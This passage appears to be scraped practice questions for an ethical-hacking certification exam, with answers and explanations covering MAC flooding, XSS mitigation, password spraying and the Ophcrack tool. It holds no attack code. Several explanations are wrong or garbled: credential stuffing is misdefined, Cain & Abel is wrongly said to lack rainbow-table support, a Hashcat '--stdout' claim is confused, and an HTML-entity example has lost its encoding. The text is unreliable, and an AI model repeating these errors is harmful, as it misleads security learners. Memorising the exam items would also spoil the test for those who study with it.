ECC (Elliptic Curve Cryptography) offers strong security with smaller keys compared to RSA. Diffie-Hellman is a key exchange protocol, 3DES is symmetric, and SHA-256 is a hash function.
A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?
A.MAC flooding
B.ARP poisoning
C.STP attack
D.DNS spoofing
AnswerA
MAC flooding involves overwhelming a switch's Content Addressable Memory (CAM) table (also known as MAC address table) with a multitude of forged source MAC addresses. When the CAM table becomes full, the switch can no longer store new legitimate MAC-to-port mappings. Consequently, for any new incoming frames destined for an unknown MAC address, the switch resorts to broadcasting the frames out of all ports, effectively degrading its functionality to that of a network hub. This allows an attacker to capture traffic intended for other hosts on the segment.
Why this answer
MAC flooding exploits the limited size of a switch's Content Addressable Memory (CAM) table. By sending thousands of packets with unique, fake source MAC addresses, the attacker fills the CAM table, forcing the switch to fail open and broadcast all incoming frames to every port, effectively behaving like a hub. This allows the attacker to capture traffic not originally destined for their port.
Exam trap
EC-Council often tests the distinction between MAC flooding (layer 2 CAM table exhaustion) and ARP poisoning (layer 2/3 cache manipulation), so candidates mistakenly choose ARP poisoning because both involve MAC addresses, but only MAC flooding causes the switch to broadcast traffic like a hub.
How to eliminate wrong answers
Option B (ARP poisoning) is wrong because it manipulates the ARP cache of hosts to associate the attacker's MAC address with the IP address of a legitimate device, enabling man-in-the-middle attacks; it does not flood the switch's CAM table. Option C (STP attack) is wrong because it targets the Spanning Tree Protocol by sending forged Bridge Protocol Data Units (BPDUs) to cause topology changes or denial of service, not by exhausting CAM table entries. Option D (DNS spoofing) is wrong because it corrupts DNS resolver caches to redirect domain name lookups to malicious IP addresses, which is a layer-7 attack unrelated to switch MAC address tables.
Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?
Select 3 answers
A.Output encoding
B.Implementing Content Security Policy (CSP)
C.Disabling JavaScript in the client browser
D.Using HTTPS for all communications
E.Input validation
AnswersA, B, E
When user-supplied data is rendered back to a client, output encoding converts special characters (like <, >, &, ", ') into their entity equivalents (e.g., <, >). This process prevents the browser from interpreting these characters as active content or HTML tags, effectively neutralizing any embedded malicious scripts and ensuring they are displayed as harmless text rather than executed.
Why this answer
Input validation ensures malicious characters are rejected. Output encoding converts special characters to safe HTML entities. Content Security Policy (CSP) restricts script sources.
Disabling JavaScript is not practical. Using HTTPS protects data in transit but not against XSS.
A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?
A.Password spraying
B.Credential stuffing
C.Brute force attack
D.Dictionary attack
AnswerA
Password spraying is a targeted attack where an attacker attempts a small number of common passwords against a large list of usernames. This technique is specifically designed to bypass account lockout policies by distributing login attempts across many accounts, rather than repeatedly failing on a single account. By trying 'Password123!' on hundreds of accounts, the attacker significantly increases their chances of finding a valid credential without triggering security alerts for excessive failed logins on one user. This method is highly effective against organizations with weak password policies and large user bases.
Why this answer
Password spraying involves trying a small number of common passwords against many user accounts to avoid account lockout. This contrasts with credential stuffing (using many passwords per account) and brute force (many passwords per user).
Which tool is specifically designed to crack Windows LM and NTLM hashes using precomputed tables?
A.Ophcrack
B.John the Ripper
C.Cain & Abel
D.Hashcat
AnswerA
Ophcrack is purpose-built for cracking Windows LM and NTLM hashes, leveraging precomputed rainbow tables for highly efficient password recovery. Its specialization allows it to quickly reverse these specific hash formats by performing a time-memory trade-off, making it exceptionally fast for common passwords. The tool comes with pre-generated tables, significantly reducing the computational effort required compared to on-the-fly cracking methods.
Why this answer
Ophcrack is specifically designed to crack Windows LM and NTLM hashes using precomputed rainbow tables. It relies on the time-memory trade-off technique, where hashes are looked up in precomputed tables rather than computed on the fly, making it highly efficient for these specific hash types. The tool is bundled with free rainbow tables for LM hashes and supports NTLM through additional table sets.
Exam trap
The trap here is that candidates often confuse 'precomputed tables' with general cracking tools like Hashcat or John the Ripper, which can also use precomputed tables in some configurations, but Ophcrack is the only tool specifically designed and optimized for that purpose with Windows LM/NTLM hashes.
How to eliminate wrong answers
Option B (John the Ripper) is wrong because it is a general-purpose password cracker that uses brute-force, dictionary, or incremental modes, not precomputed tables as its primary or designed method for Windows hashes. Option C (Cain & Abel) is wrong because while it can capture and crack Windows hashes, it relies on dictionary, brute-force, or cryptanalysis attacks, not precomputed rainbow tables. Option D (Hashcat) is wrong because it is a high-speed GPU-based cracker that uses brute-force, dictionary, or rule-based attacks, and although it supports precomputed tables via the '--stdout' mode with hashcat-utils, it is not specifically designed for precomputed table attacks like Ophcrack.